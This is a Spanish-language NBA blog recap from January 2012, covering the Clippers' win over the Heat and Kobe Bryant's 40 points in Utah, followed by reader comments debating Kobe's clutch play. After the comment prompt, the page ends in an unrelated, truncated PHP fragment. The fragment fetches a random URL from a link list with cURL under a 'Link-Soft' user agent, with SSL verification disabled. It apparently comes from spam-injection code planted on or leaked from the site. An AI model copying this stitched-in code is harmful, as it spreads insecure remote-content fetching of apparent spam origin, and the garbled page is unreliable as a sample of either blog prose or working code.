La Crónica: Chris Paul se carga a los Heat

12 de January de 2012 por TheDeerHunter

Sensacional jornada. Hasta 3 duelos se resolvieron con prórroga. Máxima emoción, grandes piques, actuaciones épicas, polémica… Todo lo que nos gusta de nuestra liga favorita.

Segunda derrota consecutiva de los Heat (89-95), aunque sin pretender quitarle méritos a los Clippers fue un auténtico tiro en el pie de LeBron, con un horripilante 9 de 17 en tiros libres y malos porcentajes también en tiros de campo. Fantástica exhibición de Chris Paul, que se quitaba la espina de la noche anterior. El choque tuvo máxima igualdad de principio a fin, decidiéndose en la tercera prórroga en esta gira de los Heat. En ella volvieron a evidenciarse algunos de sus fantasmas en las situaciones límite.

Prórroga también para Lakers. Volvía Kobe a alcanzar los 40 puntos pero aún así sufrieron para salir vivos de Salt Lake (90-87). Tuvo que ser un tapón ganador de Bynum (de un total de 5) el que inclinara definitivamente la balanza. Por los Jazz destacados Millsap y Josh Howard.

La tercera de las prórrogas fue en el Houston@San Antonio (95-101). Sensacional Parker y decisivo trabajo de Duncan. Kawhi Leonard está aprovechando bien el hueco que ha dejado Manudo. Por los Rockets bien Scola, Lowry y Kevin Martin, pero les faltó acierto exterior y buena parte de culpa la tuvo el 0 de 5 de Martin.

Cayeron dos de los equipos más en forma del momento. Philadelphia lo hizo en New York (79-85), al no poder parar a Carmelo y Orlando sacó una difícil victoria del Rose Garden, resistiendo por los pelos un arreón final de los locales demoledor (107-104). Los de Florid acontaron con hasta 7 hombres en dobles figuras.

Siguen líderes Oklahoma y Chicago, que no tuvieron problemas para doblegar a Hornets (95-85) y Wizards respectivamente (64-78). En otros partidos interesantes Dallas ganó en Boston (90-85), Pacers mantuvieron su imbatibilidad local ante Hawks especialmente gracias a Granger (84-96) y los Nuggets resistieron un auténtico chaparrón de triples por parte de los Nets (115-123) con un fantástico Rudy Fernandez. Por último los Kings igualan el balance de Raptors con su victoria ante ellos en una actuación sobresaliente de Tyreke y Cousins (98-91).

TOP-10

PREMIOS

MVP: Por segunda noche consecutiva, Kobe Bryant llega a los 40 puntos. Esta vez consiguió exactamente esa cifra que adornó con 8 rebotes y 4 asistencias. Su “vecino” Chris Paul se quedó en 27 pero repartió 11 asistencias y capturó 6 rebotes. Por su parte, Kevin Durant se fue a los 29 puntos, 10 rebotes y 4 tapones. Trío de ases.

Rookie: El premio del día se lo lleva Isiah Thomas de los Sacramento Kings. Desde el banco aportó 20 puntos y 6 asistencias sustituyendo en buena parte del partido a su compañero Jimmer Fredette.

Sorpresa: John Lucas III salió de titular debido a la lesión de Derrick Rose y decidió convertirse en el jefe. Anotó 25 puntos, capturó 8 rebotes y asistió en 8 ocasiones a sus compañeros. Eso sí, no sabemos si a estos les hizo mucha gracia que un advenedizo se tirara hasta las zapatillas. Los 26 puntos de Jordan Farmar también hay que nombrarlo.

Decepción: Poco le ha durado la alegría a los Wizards. Infame su partido de ayer en el que solo fueron capaces de anotar 64 puntos. Nick Young 2- 11, John Wall 4-13, Rashard Lewis 3-10, Jordan Crawford 4-12, Shelvin Mack 0-3, Kevin Seraphin 0-4, Javale McGee 5-13, Trevor Booker 4-10… Así no se puede.

Esfuerzo en vano: Paul Millsap fue el ‘Jazz’ que más peleó por que los Lakers no se llevaran la victoria. Desgraciadamente para él, sus 29 puntos, 9 rebotes y 3 robos quedaron en nada.

Imágenes | AP Photos / Getty Images

Comenta

42 comentarios a esta entrada

  1. The wolf dice:
    #1

    Cosas asi rapidas a destacar…increible el partido de clippers – heats y ciertamente acabo perdiendo lebron el partido fallando los tiros libres finales…(1/2 3 veces en el ultimo minuto)

    Despues destacar la primera parte abobinable de portland contra orlando……y el espectacular “casi intento de remontada” que casi consigue Portland…de mas de 20 puntos de distancia casi al final del tercer cuarte a estar a 3 puntos a 3 minutos del final.

    Por ultimo destacar el gran partido del rookie thomas en sacramento al menos lo que he visto de el me ha encantado se le descaro al chaval y es buen asistente…y por ultimo….el tal lucas III…amos a ver un tio que sale hoy por lesion de Rose y que normalmente juega poquito…como se puede jugar 28 tiros!! a ver si juegas 46 minutos obviamente a 20 vas a llegar pero si eres el ultimo mono por alli y encima no estas acertando (1/7 en triples)…como puedes permitir que se tire 28…vamos que si se centra mas podria hasta haber pillao un triple doble…se quedo en 25/8/8 que son numeros extraordinarios eso si…pero vamos que se paso la jerarquia por el forro de…

      Citar

  2. AndiD dice:
    #2

    Acabo de ver los últimos minutos del Lakers-Jazz y… MVP para Bryant?? Sí, metió 40 puntos y con porcentajes decentes, pero lo de ser el clutch-man no lo lleva demasiado bien 🙂
    Estas son sus estadísticas en el último minuto del partido y de la prórroga:
    1 balón perdido
    1 rebote no cerrado para que Utah empate el partido
    1 airball para ganar el partido
    — Prórroga —
    1 falta recibida dudosííííma de Raja Bell cuando ya no sabía qué hacer con la bola
    3 tiros fallados
    2 tiros libres convertidos cuando ya se había acabado el partido.

      Citar

  3. busky23 dice:
    #3

    Impresionante Kobe,podéis darle todos los palos q os de la gana ni será el máximo representante del juego colectivo,pero es un placer verle jugar a este nivelazo 15 años después d aterrizar en la NBA.
    Tiene todo lo q se puede ganar individual y colectivamente,gana mas dólares que nadie,ha dejado en evidencia a cientos de rivales,contamos actuaciones suyas memorables por decenas y a pesar de todo  nunca,nunca pierde ese instinto ganador-asesino,que tanta rabia da a mucha gente.
    Necesita sentirse el mejor continuamente,retarse a si mismo y a mi eso como espectador,que queréis que os diga, a mi me pone.

    Que lanza mucho??? Un dato: entre Fisher y el MetaWorldArtestPeace 4 de 40!!!!!!!! llevan los angelitos esta temporada en triples,estos son los q tienen que lanzar???

    Larga vida a Kobe y que siga la leyenda y a quien no le guste hay casi cada noche 10 partidos para ver,yo lo tengo claro,elijo a Kobe Bryant.

      Citar

  4. TheDeerHunter dice:
    #4

    AndiD:
    Acabo de ver los últimos minutos del Lakers-Jazz y… MVP para Bryant?? Sí, metió 40 puntos y con porcentajes decentes, pero lo de ser el clutch-man no lo lleva demasiado bien

    Se está hablando mucho de eso:
    http://espn.go.com/blog/truehoop/post/_/id/24200/the-truth-about-kobe-bryant-in-crunch-time

    Para mí es un poco parida todo eso. Al hilo de obsesiones estadísticas puras. Es lo mismo que te ha ocurrido a ti, Andid… que sin haber visto (yo) el partido ya olvidas una asistencia que he visto que le da a Pau al triple en la esquina, por ejemplo.

    Sólo decir que como dice el artículo Kobe lleva siendo elegido como “jugador al que le daría el balón para resolver un partido” 9 veces consecutivas por los GM y no creo que sea casualidad. Tampoco lo es que se la ha jugado 115 veces en su carrera (aunque eso tenga dos lecturas) a años luz de otros.

    Respondo a la misma cuestión de Iverson, con sutiles matices. Cuando hay un muestreo tan sumamente amplio es normal que los porcentajes tiendan a bajar.
    Vamos, que si la conclusión es que gente como Marion, Rashard Lewis, Ben Gordon o Eddie Jones son mejores en ese arte que Kobe yo me meo en los pantalones… ni siquiera Melo o CP3, es que me parece una absoluta broma.

    Si acaso se le puede reprochar exceso de celo en si mismo. Eso en un killer como él eso es más bueno que malo. De hecho me vienen a la cabeza numerosos casos en los que dando una asistencia clara de clutch ha terminado fallada por el resto. Y eso es intrínseco a la configuración de sus equipos. Dudo muy mucho que los Lakers hubieran tenido mejores resultados en su historia si Kobe hubiera actuado de otra manera en esos “fallos” que sacan a la palestra de forma totalmente oportunista. Sólo por el cisco que causa Kobe en esas situaciones hace que merezca la pena.

    Vamos, que me toca las narices que Kobe se lance más que sus otros “all-stars” juntos, pero si le tengo que dar un balón a alguien para resolver un cluth estaría mucho más tranquilo si lo tiene él que si lo tiene Pau o Bynum… de aquí a Australia y volviendo.

      Citar

  5. ralage dice:
    #5

    Siguen con problemas los Celtics esperando a Pierce, al menos MPietrus parece que puede aportar y es que superar a MDaniels tampoco es muy difícil.
    Grande Nowitzki que no tenernos acostumbrados a esto es menos notorio

      Citar

  6. Txusma dice:
    #6

    ojo que el artículo es de enero del año pasado, no de ahora.
    Yo creo que al menos Melo ha demostrado sobradamente que es un jugador al que le puedes dar la bola con tranquilidad en los segundos finales. No veo tan claro eso de broma absoluta. No creo que los amarillos sobrevaloréis a Kobe sinó que directamente tendéis a infravalorar al resto en este aspecto, como si nadie más en la liga sirviera.

      Citar

  7. Txusma dice:
    #7

    Otra tabla para reflexionar: http://www.82games.com/1011/CSORT11.HTM. Producción en los minutos clucth de los partidos de la 2010/2011 (5 últimos minutos de partidos con el partido igualado).

      Citar

  8. TheDeerHunter dice:
    #8

    Yo no he dicho que no sirva. He dicho que no está suficientemente testado para demostrar nada… que todos esos clutch que ha metido Melo no han servido para una castaña y que cuando ha tenido que demostrar cosas directamente se ha escondido. Igualito que Kobe.
    A la edad que tiene Melo, Kobe ya tenía los cataplines pelados de pasarlas canutas (e imponerse) en situaciones que harían perder el control de sus esfínteres a la mayoría de los hombres. Un ejemplo, el partido nº4 de la final del 2000 en indianápolis, con Shaq eliminado a los 21 años. Que no todo es una simple jugada a cara o cruz… que se lo digan a Michael Jordan, que igual leyendo el artículo va a pensar que era un manco en esas artes.

      Citar

  9. Alfredo dice:
    #9

    No escribo mucho, pero la NBA la sigo bastante, y vuestro blog más. Ayer seguía el partido de Indiana y me asalta una duda… Cuánto le gustaría al mejor Reggie Miller jugar en estos Indiana Pacers?? En qué lugar del Este los pondríamos con ese jugador??

      Citar

  10. TheDeerHunter dice:
    #10

    Alfredo:
    No escribo mucho, pero la NBA la sigo bastante, y vuestro blog más. Ayer seguía el partido de Indiana y me asalta una duda… Cuánto le gustaría al mejor Reggie Miller jugar en estos Indiana Pacers?? En qué lugar del Este los pondríamos con ese jugador??

    Muy agradecidos por tus comentarios Alfredo.
    Sobre Killer Miller soy de la opinión que sería importante en básicamente cualquier equipo de la historia… otra cosa es la cuestión de cómo se adaptaría al juego actual de los Pacers. Teniendo en cuenta su estilo de juego, tiro tras bloqueo/s me da que echaría en falta bases de mayor nivel y que el actual juego del equipo es algo más coral y equilibrado.
    En realidad no me parece que este equipo sea superior al que él disfrutó… aunque claro, ahora no se tiene que cruzar nunca con Jordan.

      Citar

  11. Alfredo dice:
    #11

    Un puntito por detrás de los actuales Bulls y Heat actuales entonces 😉

      Citar

  12. AndiD dice:
    #12

    Vaya, cómo te caen palos por aquí en cuanto nombras a Kobe 🙂 A ver, por partes.
    Busky, no te pongas nervioso. Yo no le he dado ningún palo a Kobe, sólo discrepo con lo de darle el MVP de esta jornada, como ha dicho TheDeerHunter. ¿Es un placer verle jugar? Sí. ¿Tiene más recursos que nadie para anotar? También. ¿Que meta 40 puntos en un partido horas después de meter 48 es una barbaridad? Por supuesto. ¿Es mejor que Fisher y MWP juntos? Sin duda. Todo eso ya lo sabemos todos.
    Pero también es verdad lo que yo he escrito antes: que ayer jugó unos últimos minutos horribles.
    Ah, y ya sé que hay muchos otros partidos por ver, gracias por el recordatorio.

    Deer, en la asistencia a Gasol que tú dices quedaban todavía 2 minutos. Lo que yo he escrito es sólo del último minuto del 4° cuarto y del último minuto de la prórroga.

    Es una maravilla ver jugar a Kobe y las ganas que tiene siempre (defensa y ataque), pero no dudo que le iría mucho mejor a los Lakers si de vez en cuando doblara algún pase en los últimos segundos.
    Y como Txusma, no veo para nada claro lo de broma absoulta.

      Citar

  13. TheDeerHunter dice:
    #13

    No sé, AndiD… está escrito aquí muchas veces lo que yo opino concretamente de Kobe y yo no soy su máximo defensor (y por cierto, su elección al MVP concretamente no es mía, aunque la comparto totalmente)
    Lo de los últimos minutos no lo había entendido… pero igualmente me parece circunstancial.

    Es que éste en concreto es un debate absolutamente estéril. ¿Qué es lo que han demostrado exáctamente Melo y CP3 más que Kobe en esta vida en lo que se refiere al clutch? A los más críticos con Kobe… ¿estáis seguros que le daríais el balón a Melo o CP3 antes que a Kobe en la última posesión del último partido de la próxima final??
    Pero por dios… si ni uno ni otro han vislumbrado en su vida ni de lejos esa circunstancia. ¡Son más novatos que Ricky en una situación a vida o muerte!!

    Ah, y otra más!! en qué exáctamente le hubiera ido “MUCHO” mejor a los Lakers durante los años en los que ha estado Kobe en sus filas bajo ninguna otra circunstancia. ¿En serio piensas eso?

      Citar

  14. TheDeerHunter dice:
    #14

    Alfredo:
    Un puntito por detrás de los actuales Bulls y Heat actuales entonces;)

    En realidad tampoco te creas que tengo claro lo que pasaría si Heat o Bulls se tuvieran que cruzar con un equipo donde estuviera Miller en una eliminatoria de playoffs. Igual chorreaban caquitas (las de otros)

      Citar

  15. Pop dice:
    #15

    Es que a veces perdemos la visión de la temporalidad en su conjunto o algo así. Podemos hablar todo lo que queramos del último minuto del último partido de Kobe. Es un grano de arena en su carrera entera, donde ya se habrá perdido la cuenta de los equipos que se han ido cabizbajos a vestuarios porque Kobe les ha metido la canasta ganadora sonando la bocina.

    Evidentemente no es infalible, ni Jordan lo era, así que habrá partidos en los que falle ese tiro. Pero pararse a pensar si es conveniente darle a Kobe la pelota para decidir un partido en los ultimos segundos me parece totalmente fuera de lugar. Y yo soy de los que piensan que el mayor defecto suyo es su egolatría.

      Citar

  16. AndiD dice:
    #16

    TheDeerHunter:
    ¡Son más novatos que Ricky en una situación a vida o muerte!!

    Ah, y otra más!! en qué exáctamente le hubiera ido “MUCHO” mejor a los Lakers durante los años en los que ha estado Kobe en sus filas bajo ninguna otra circunstancia. ¿En serio piensas eso?

    Lo de Ricky es genial 😀

    Yo no digo que sean mejores que Kobe. Sólo digo que Kobe podía soltar más la bola en el último tiro. Así a bote pronto me vienen a la cabeza el 4 contra 1 contra Orlando con tapón de Turkoglu, el año pasado contra Dallas y hace un par de años contra Phoenix (y sólo hablando de playoffs).

      Citar

  17. Ru dice:
    #17

    No soy fan de Kobe precisamente,de hecho actualmente critico que el juego de la franquicia sea tirarse 400 tiros por partido porque así no van a ningún lado -si no estuviera Gasol me daba igual- pero hay que reconocer que como tio que se juegue la última bola Kobe es el mejor por lo que ha demostrado durante tanto tiempo.Ya podía LeBron -uno de mis jugadores favoritos,por no decir el que más- tener esa habilidad,mismamente esta noche se ha visto en sus tiros libres.

    El John Lucas III tiene un nombre molón,jaja,habrá que estar atento a próximos partidos a ver qué tal lo hace porque Darren Collison tiene cierto status en la NBA porque con la ausencia de CP3 en los Hornets se marcó auténticos partidazos,quién sabe si el Lucas III estará a la altura de hacer lo mismo.Y como la cosa está de bases,¿quién se la ha comido contra el bueno de Lucas?John Wall…para mí una de las decepciones de la temporada junto a los Nets.Otro base,Jonny Flynn…prometedora primera temporada,llega la lesión y se perdió el jugador por el camino…carne de D-League.No juega habitualmente ni un minuto y comparte puesto con Lowry,aquel pequeñito pero fornido jugador,prototipo combo guard,totalemente alocado en los Grizzlies y que ha evolucionado tremendamente en los dos últimos años promediando cerca del triple doble todas las noches.

    Esta noche Irving vs Nash,demostración del rookie o clase de fundamentos del viejo rockero,me lo perderé,prefiero ver a los ositos contra los Knicks.

      Citar

  18. rumbero dice:
    #18

    ¿Los poyuelos de los Wizards le quieren hacer la cama al entrenador? Porque no es la primera ni la segunda vez en la temporada que veo esos porcentajes de tiro de casi todo el equipo. No me creo que sean tan malos…

    Desde hoy fan absoluto de John “juego mi primer partido y me casco 28 tirazos” Lucas III. Menudo crack. Kobe un aprendiz a su lado.

      Citar

  19. German dice:
    #19

    Que gran partido el Heat-Clippers de anoche. Increible el porcentaje de Lebron desde la linea.
    Cada vez veo defender mejor a Miami, por momentos no sabian que hacer los Clippers, la llegada de Battier es importante en este sentido.
    No se ustedes pero a mi ya me cansa que no piten pasos, si bien es a todos en general, lo veo muy notorio en Miami! En la ultima posesion del Heat en tiempo regular, Lebron mueve el pie de apoyo como 2 km hasta que recibe la falta. Bosh es otro que se abusa, los arbitros estan al lado y no cobran casi nunca.
    Por cierto Bosh esta tomando cada vez mas tiros de tres, lleva lanzados mas que James y Wade juntos xD

      Citar

  20. German dice:
    #20

    Me olvidaba, que falta de respeto que Lucas (tercer base del equipo!!!) tome 28 tiros!!!!

      Citar

  21. Nacho dice:
    #21

    Kobe:
    Yo no he visto el partido de hoy. Pero en el resumen se ve lo que dice AndiD. El problema creo que es que se ciega en la jugada. Cierto que es el mejor en este aspecto (y en casi todo) pero si se juega la bola y cuatro tíos se le echan encima no pasa nada si la dobla. En el triple de Pau (importantísimo por cierto) lo hace y le sale bien. Podría haberlo repetido. Creo que las críticas que aquí se vierten va en esa dirección, y yo estoy de acuerdo. Obviamente si soy yo el que decide la última posesión le doy la bola a él, eso está claro, solo un odio irracional haría que alguien no lo hiciera, pero otra cosa es que el mismo Kobe se ciegue muchas veces. Y el hecho de volver a asumir tantos tiros como hace este año creo que es algo que no es inteligente por su parte. Por la del entrenador ya sabemos que es su estilo de juego. Y hoy (estadísticamente hablando, y eso que no me gusta mucho) ni Pau ni Bynum han estado acertados en el tiro, pero ayer… y siempre esta temporada… ¿acaso prefiere el MVP que luchar en serio por el anillo?

    LeBron
    Todos sabemos por qué fichó por Miami. Para tener a un tío al lado que le pudiese ganar los partidos en los minutos finales. Y si me apuras tiene a dos. ¿Qué es muy bueno? Sí. Pero te gana los partidos por aplastamiento, pero si el rival se levanta y llega con opciones al minuto final, él no puede. Al menos de momento. Por eso no le llega a Kobe ni a la cintura, por muchos MVPs que obtenga, AllStars, o record de puntos. ¿O en Miami alguien tiene duda de a quién dársela en la posesión final, y dos abajo?

      Citar

  22. Nacho dice:
    #22

    A mí última pregunta: Sí, anoche el propio Wade.
    Ya sin coña, Wade es que las juega y le da dos claras penetraciones a LeBron (igual se equivoca- y sin igual)
    ¿Igual por eso no lo hace Kobe?
    ¡Que follón!
    P.D. no se poner emoticonos o como se llamen

      Citar

  23. Esteban dice:
    #23

    Y el big trhee? Lebron, q miedo le tenia a jordan ayer, no volco una sola bola en los ultimos caurtos y cambio todos sus tiros para no ser tapado y asi erro todas sus bandejas, para luego errar todos los libres

    Partido jugado con intensidad de PO, los clippers a la altura del lider y solo llevan 7 partidos jugando juntos, y le faltan algunos fichajes

      Citar

  24. inad23 dice:
    #24

    Creo que se nos olvida que el baloncesto es un juego de equipo, Kobe puede seguir pegandose muchas bolas mientras los demás no rascan apenas la bola que así se quedaran en 1a ronda. Parece que Mike Brown sólo sabe jugar a través de las individualidades…es una pena porque ya Dallas demostró a todo el mundo cómo se tiene que jugar al basket,cuanto más colectivo se juegue más eficacia se consigue….

      Citar

  25. TheDeerHunter dice:
    #25

    Yo no pienso censurar a un tío que se tire 80-100 tiros y meta un 50%… me parece un poquito cuadriculado eso de que el baloncesto debe de ser de equipo.
    El baloncesto es de equipo pero también tiene un componente individual muy gordo.
    Si un tirador (o cualquier jugador, vamos) está enchufado y anota, balones a Wilt…

    Con Kobe le pasa un poco a la gente como con Pau. Tiene una etiqueta, en cierta medida por sus propios “pecados”, pero que llega a tapar la realidad (que es que también es un excelente pasador de clutch)
    Los que somos de los Lakers tenemos claro que es casi imposible mejorar lo que nos ha dado Kobe, con sus virtudes y sus contados defectos baloncestísticos. Me parece una auténtica atrocidad reprocharle su capacidad decisiva en las peores situaciones de presión. Personalmente me hubiera gustado que hubiera soltado el balón en alguna ocasión de esas (que yo desde mi casa o con mi mando xbox veo muy claras, pero igual con 4 defensores tapandome los ojos no las veía igual) pero mi percepción no garantiza que el resultado hubiera sido mejor… al igual me hubiera gustado que Phil se hubiera pasado por el forro alguna vez el triángulo para variar. Posiblemente tampoco hubiera mejorado el producto.

      Citar

  26. RSB dice:
    #26

    Si Brown pretende hacer de los Lakers unos Cavaliers 2.0, tendría que tener en cuenta que Pau y Bynum son dos jugadores top 25 de esta liga, y no son simples escuderos como los acompañantes que tenía Lebron. Tienen a la mejor pareja interior del campeonato totalmente desaprovechada con el Kobesistema, antes por lo menos parecían un equipo aunque Kobe se tirara todo los últimos 5 minutos de partido. Si no se sienten importantes cada vez van a ir a menos (de Pau se dice que es porque está cabado, es blando, bla bla bla, pero Andrew empezó como un tiro y cada vez se juega menos balones… Aunque decidieron el partido en la prorróga).

    Antes si podía veía a LAL, ahora me aburren, prefiero ver a los Clippers, Minnesota o cualquier otra cosa. Bryant es un genio, pero me gustaba más cuando el balón circulaba y otros también podían destacar

      Citar

  27. Nacho dice:
    #27

    RSB: Si Brown pretende hacer de los Lakers unos Cavaliers 2.0, tendría que tener en cuenta que Pau y Bynum son dos jugadores top 25 de esta liga, y no son simples escuderos como los acompañantes que tenía Lebron. Tienen a la mejor pareja interior del campeonato totalmente desaprovechada con el Kobesistema, antes por lo menos parecían un equipo aunque Kobe se tirara todo los últimos 5 minutos de partido. Si no se sienten importantes cada vez van a ir a menos (de Pau se dice que es porque está cabado, es blando, bla bla bla, pero Andrew empezó como un tiro y cada vez se juega menos balones… Aunque decidieron el partido en la prorróga).Antes si podía veía a LAL, ahora me aburren, prefiero ver a los Clippers, Minnesota o cualquier otra cosa. Bryant es un genio, pero me gustaba más cuando el balón circulaba y otros también podían destacar

    Amén.
    Yo añadiría la pregunta ¿Qué ganaron los Cavaliers.1.0, y que hicieron los Lakers en el mismo periodo y con los mismos mimbres de ahora?

      Citar

  28. kantonyo dice:
    #28

    Pues yo después de ver el partido Lakers-Utah opino algo parecido a AndiD y RSB, es la sensación que me ha dejado.

    Y entiendo perfectamente la postura de TheDeerHunted… que sí, que es el mejor de la última década, no tengo duda, que es el mejor jugador para darle la pelota en los últimos segundos, yo lo elegiría…

    Pero no me gusta el baloncesto donde un tío se tira todo lo que pilla, que no mira a sus compañeros, que se ciega con la pelota a pesar de no tener escapatoria, y que incomprensiblemente los árbitros le acaban salvando casi siempre con una falta.

    Por cierto “Deer” discrepo totalmente contigo cuando elogias la asistencia en el triple de Gasol ….¡¡ pero si hubo más de cinco jugadas en los últimos minutos donde pudo hacerlo y por el contrario se jugó la pelota él!!.

    A mi me sorprendió más el pase de Bryant a Gasol, que el propio triple del español, que por cierto tuvo un mediocre partido.

      Citar

  29. Jose Luis dice:
    #29

    ¿Alguien sabe algo de por qué no juega Hamed Haddadi con los Grizzlies?

      Citar

  30. Ru dice:
    #30

    Y dicho esto a ver lo que tarda Kobe/los medios angelinos…en criticar al resto del equipo (=Pau) por su poca colaboración con Kobe Bryant.Otras veces ya ha sucedido lo mismo.

      Citar

  31. TheDeerHunter dice:
    #31

    kantonyo:
    Pues yo después de ver el partido Lakers-Utah opino algo parecido a AndiD y RSB, es la sensación que me ha dejado.

    Y entiendo perfectamente la postura de TheDeerHunted… que sí, que es el mejor de la última década, no tengo duda, que es el mejor jugador para darle la pelota en los últimos segundos, yo lo elegiría…

    Pero no me gusta el baloncesto donde un tío se tira todo lo que pilla, que no mira a sus compañeros, que se ciega con la pelota a pesar de no tener escapatoria, y que incomprensiblemente los árbitros le acaban salvando casi siempre con una falta.

    Por cierto “Deer” discrepo totalmente contigo cuando elogias la asistencia en el triple de Gasol ….¡¡ pero si hubo más de cinco jugadas en los últimos minutos donde pudo hacerlo y por el contrario se jugó la pelota él!!.

    A mi me sorprendió más el pase de Bryant a Gasol, que el propio triple del español, que por cierto tuvo un mediocre partido.

    No elogio ni dejo de elogiar, kantonyo… yo ahí no entro. Siemplemente digo que Kobe y cualquier otro jugador debería de tener la libertad de desplegar su baloncesto cuando éste es bueno. Yo creo que nadie en su sano juicio puede defender que si un tío está en un momento dulce y probablemente la va a meter tenga por narices que dársela a su compañero por aquello de “que buen compañero queda que soy”.
    Kobe también es un extraordinario pasador… pero como tiene su etiqueta de egoísta la gente tiende a ignorar este hecho. Estamos cayendo en el mismo pecado que nos quejamos con lo de “soft” Gasol.

    Yo también prefiero un basket más colectivo… pero en ningún caso puedo rechazar la pureza del baloncesto individual en sus más altas cotas de excelencia. Si todos los equipos fueran igual de colectivos (como aquí en Europa, por ejemplo) para mí perdería buena parte del encanto, simplemente por falta de alternativas. La gran virtud del basket es su plasticidad… a mí sólo me falta por oir alguien que critique los 100 de Chamberlain, los 81 del propio Kobe.
    No me parece bien que un tirador anote el 50% de sus tiros y se le critique por haber tirado muchos. Cuando haya que criticarle se le critica, pero no será por un motivo como ese.

      Citar

  32. melo15 dice:
    #32

    Perdon, porque estoy comentando poco estos dias (cole) pero vuelvo a la carga.
    La conmparacion Melo-Ricky es inadmisible, Melo le funde, no hay mas que decir.
    Kobe puede tirarse 50 tiros por noche, si llega al 50% de acierto, no se le puede reprochar nada.
    Nacho: pues yo dudo a quien darsela en los munutos finales, si a Lebron lo defiende Iggy, entonces le daria la pelota a Wade que le defiende Meeks XD

      Citar

  33. Esteban dice:
    #33

    bastaaaaa de criticar a kobe por dios!! cuantos jugadores en activo han ganado la mitad de los titulos que kobe y cuantos han jugado la mitad de finales de la nba y cuantos han jugado un tercio de finales de conferencia que el?

    miren que hay jugadores superestrellas mundiales que aun no han ganado nada, ni se han bancado reconstrucciones en sus equipos, caso lebron, paul, deron, melo, y ustedes critican a kobe?

    aclaro, no soy de los lakers ni cerca

      Citar

  34. Viva_Dirk dice:
    #34

    melo15:
    La conmparacion Melo-Ricky es inadmisible, Melo le funde, no hay mas que decir.

    Le funde?? Pegandose??

      Citar

  35. Viva_Dirk dice:
    #35

    Ru:
    Y dicho esto a ver lo que tarda Kobe/los medios angelinos…en criticar al resto del equipo (=Pau) por su poca colaboración con Kobe Bryant.Otras veces ya ha sucedido lo mismo.

    Pues no creo que a Pau&Bynum se les critique nada ni se pueda decir que Kobe les quite balones ya que Gasol lanza lo mismo que los 2 años que fueron campeones y Bynum tira mas que nunca, de hecho solo Al Jefferson tira mas que el si buscamos entre los centers.

      Citar

  36. Esteban dice:
    #36

    Viva_Dirk: Pues no creo que a Pau&Bynum se les critique nada ni se pueda decir que Kobe les quite balones ya que Gasol lanza lo mismo que los 2 años que fueron campeones y Bynum tira mas que nunca, de hecho solo Al Jefferson tira mas que el si buscamos entre los centers.

    les quita balones a los muertos de sus compañeros, lease fisher, blake, meta world peace, barnes etc

      Citar

  37. inad23 dice:
    #37

    Por cierto, RRR está en 3a posición de los bases más votados del oeste…interesante creeis que ira al All-Star? Yo creo que no aunque sería increible, se nota que RRR tiene tiron alli en USA…

      Citar

  38. Cocinitas dice:
    #38

    Que pena me da ver desaprovechar sus últimos años a Steve Nash en estos Suns. No podrian traspasarlo a los Lakers por la trade exception de Odom y que así se jubilara con uno o 2 anillos, no estaria mal. Hoy 16 puntos y 15 asistencias, increible. Por cierto Irving esta mejorando mucho su porcentaje de tiro, hoy 26 puntos con grandes porcentajes, 6 perdidas eso si.

      Citar

  39. melo15 dice:
    #39

    Las perdidas da igual en tu año Rookie.
    Vive que Ricky este haciendo una buena tempora, pero compararlo con Melo es pasarse, Meo ha sido all-star unas 5 veces y ha estado en playoffs toda su vida, algo que ni Lebron puede decir, aver si Ricky se clasifica este años a playoffs, Melo ha llegado a unas finales de conferencia, y no ha llegado a mas porque el oeste era imposible, entre otras cosas, Melo ha ganado tambien un oro de mundial o algo asi, Melo es el segundo jugador que mejor se crea los tiros en la NBA. Esta temporada Melo se esta saliendo (ayer no) promediando muchos puntos entre 28 y anotando canastas en los momentos finales.

      Citar

  40. melo15 dice:
    #40

    Ademas a Ricky no se le puede comparar con los Rookies de este año, sino con los del 2009, es decir Evans Curry Jennings Flynn Collinson, la mayorio hicieron numeros similares o mucho mejores, como Evans, Curry, Jennings

      Citar

  41. Esteban dice:
    #41

    jajajaja la comparacion melo-ricky, creo q es solo para pelearte a ti melo15, ya q no tiene sentido de ningun lado

    en cuanto a rookies, se e compara con los de su primer año en la nba, a griffin sino tamb habria q compararlos con los de ese draft

      Citar

  42. Esteban dice:
    #42

    Cocinitas:
    Que pena me da ver desaprovechar sus últimos años a Steve Nash en estos Suns. No podrian traspasarlo a los Lakers por la trade exception de Odom y que así se jubilara con uno o 2 anillos, no estaria mal. Hoy 16 puntos y 15 asistencias, increible. Por cierto Irving esta mejorando mucho su porcentaje de tiro, hoy 26 puntos con grandes porcentajes, 6 perdidas eso si.

    no cuajan en salarios, habria q meteralgunas rondas, odom dejo una exepcion de menos 9 y nash cobra mas de 11, quiza con algunas rondas podria encajar

    ahora, Phoenix no lo dejara marchar por unas rondas y una exepcion, creo q nadie pagara su valor por un año de contrato y por ende nash seguira alli

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>